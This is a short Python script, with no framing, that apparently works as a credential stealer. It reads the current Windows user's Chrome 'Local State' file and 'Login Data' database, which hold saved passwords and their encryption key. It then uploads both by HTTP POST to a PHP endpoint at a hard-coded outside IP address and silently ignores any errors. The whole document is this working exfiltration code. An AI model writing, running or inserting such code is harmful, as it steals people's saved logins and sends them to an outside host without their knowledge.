import os
from os import environ
import requests

user = os.environ.get("USERNAME")

file1 = rf"C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Local State"
file2 = rf"C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Default\Login Data"

try:
    for e in {file1, file2}:
        with open(e, 'rb') as f:
            url = 'http://3.85.122.241/globo_file.php'
            files = {'file': open(bytes(e, encoding='utf-8'), 'rb')}
            r = requests.post(url, files=files)
except:
    ...
